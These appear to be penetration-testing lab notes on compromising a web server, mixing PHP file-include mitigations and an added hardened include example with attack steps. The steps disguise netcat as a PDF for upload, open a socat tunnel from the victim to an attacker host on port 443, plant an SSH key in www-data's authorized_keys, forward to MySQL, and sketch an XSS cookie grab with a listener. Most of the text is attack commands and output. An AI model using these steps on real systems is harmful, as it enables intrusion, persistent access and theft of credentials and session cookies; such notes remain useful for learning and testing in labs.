Web Commands
telnet vulnerable 80
GET / HTTP/1.1
Host: test
openssl s_client -connect vulnerable:443
perl nikto.pl -h http://vulnerable
<?php
include("header.php");
include($_GET["page"]);
?>
Can add parent directories:
include("includes/".$_GET["page"]);
a file extension:
include($_GET["page"].".php");
sanitise with basename():
include(basename($_GET["page"]));
or all three:
include("includes/".basename($_GET["page"]).".php");
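A hardened version of the page include above, as an added example that is not part of the original notes: it combines the three mitigations (fixed directory, forced .php extension, basename()) with an allowlist and a realpath() containment check. The includes/ directory and the page names are assumptions.

```php
<?php
// Added example (not from the original notes): a hardened replacement for
// include($_GET["page"]) that combines the three mitigations listed above
// with an allowlist and a realpath() containment check. Paths are assumed.
declare(strict_types=1);

const PAGE_DIR      = __DIR__ . '/includes';          // assumed location
const ALLOWED_PAGES = ['home', 'about', 'contact'];   // constructed allowlist

// Map the user-supplied page name to an absolute path inside PAGE_DIR,
// or return null if the request must be refused.
function resolvePage(?string $page): ?string
{
    $page = $page ?? 'home';
    // A strict slug pattern rejects dots, slashes, NUL bytes and anything
    // else that is not a plain page name before the filesystem is touched.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/', $page)) {
        return null;
    }
    // Allowlist beats sanitisation: a name that is not a known page never
    // reaches include(), however it is spelled or encoded.
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;
    }
    $candidate = PAGE_DIR . '/' . basename($page) . '.php';
    $real      = realpath($candidate);
    $base      = realpath(PAGE_DIR);
    // realpath() returns false for missing files and resolves symlinks, so
    // the prefix check confirms the target really lives under PAGE_DIR.
    if ($real === false || $base === false
        || strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

include 'header.php';

$requested = $_GET['page'] ?? null;
$target    = resolvePage(is_string($requested) ? $requested : null);
if ($target === null) {
    http_response_code(404);
    echo 'Unknown page';
} else {
    include $target;
}
```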
Upload nc disguised as a PDF:
echo "%PDF-1.4" > pdfheader
cat pdfheader nc > nc.pdf
Upload the file, then extract it using the include vulnerability:
tail -n +2 nc.pdf > nc
Using socat to reach a firewalled SSH server on port 22 via a redirection on our system on port 2222:
socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr
Port 443 must come first, since it's the port the vulnerable machine will connect to first. On the vulnerable machine:
while true; do socat TCP4:attacker:443 TCP4:127.0.0.1:22 ; done
Then try to connect to the remote system with ssh localhost -p 2222, but we don't have www-data's password, so set up SSH keys on the remote server:
ssh-keygen -P "" -f vulnerable   [-f is the filename]
then send the files over the nc session:
nc -l -p 81
uname
Linux
grep www-data /etc/passwd
www-data:x:33:33:www-data:/var/www:/bin/sh
mkdir ~www-data/.ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC775KzgLNyNGMHt+R2WJtCTzPSgG5JFZZhTsqu3WaKv1DzAgaLzig3+OQNnKiOQ7R1qSqciOfbK3IqvYKelEg3dhngJqu2Wxrv5TCadCcJL2/RC7GME5+In3V1H9OAksuPG1dsOOoMFbfeM7JvLwDYwk6UJ6FyqVMdxxqf4fkJzxs9griQ5r5V0rG0gM7mUxc7gvxME3XCtOjmGv5MP49yCPNa9auOrclLl64P7QWQw4G5YpdD32CdQBXc4T9IkS3XeRtNNP4oN8dmPBzUFSa8P5OaA/jGpqX73DiQXd9rtwE9i1jMo8UXLt2SCCy72NudMNwshMOshXFWkVy4TDTh root@kali109" >> ~/.ssh/authorized_keys
Then connect!
ssh localhost -p 2222 -l www-data -i vulnerable
The authenticity of host '[localhost]:2222 ([127.0.0.1]:2222)' can't be established.
RSA key fingerprint is 67:58:ab:3c:de:34:15:1b:4b:bb:d7:48:df:34:c1:75.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[localhost]:2222' (RSA) to the list of known hosts.
Linux debian 2.6.32-5-686 #1 SMP Sun May 6 04:01:19 UTC 2012 i686
Now that we have SSH we can easily do port redirection, for example to a MySQL server:
ssh localhost -p 2222 -l www-data -i vulnerable -L 13306:localhost:3306
Checking the MySQL connection:
mysql -h localhost -u root -P 13306
ERROR 2002 (HY000): Can't connect to local MySQL server through socket '/var/run/mysqld/mysqld.sock' (2)
(with -h localhost the mysql client uses the Unix socket rather than TCP, so the forwarded port is ignored; -h 127.0.0.1 forces TCP)
root@kali109:~# telnet localhost 13306
Trying ::1...
Connected to localhost.
Escape character is '^]'.
? 5.1.63-0+squeeze1Obkpsr`i�|=Uvs^^>Y&N6
(the raw MySQL server greeting: protocol version byte, version string, then binary connection id and scramble bytes)
We can also use this server as a SOCKS proxy (ssh -D), or use sshfs to mount the compromised system's filesystem.
#XSS
Check by seeing how characters are encoded, e.g. 1337'"><
Trying to get the victim's cookie:
<script>document.write('');</script>
socat TCP_LISTEN:80,reuseaddr,fork -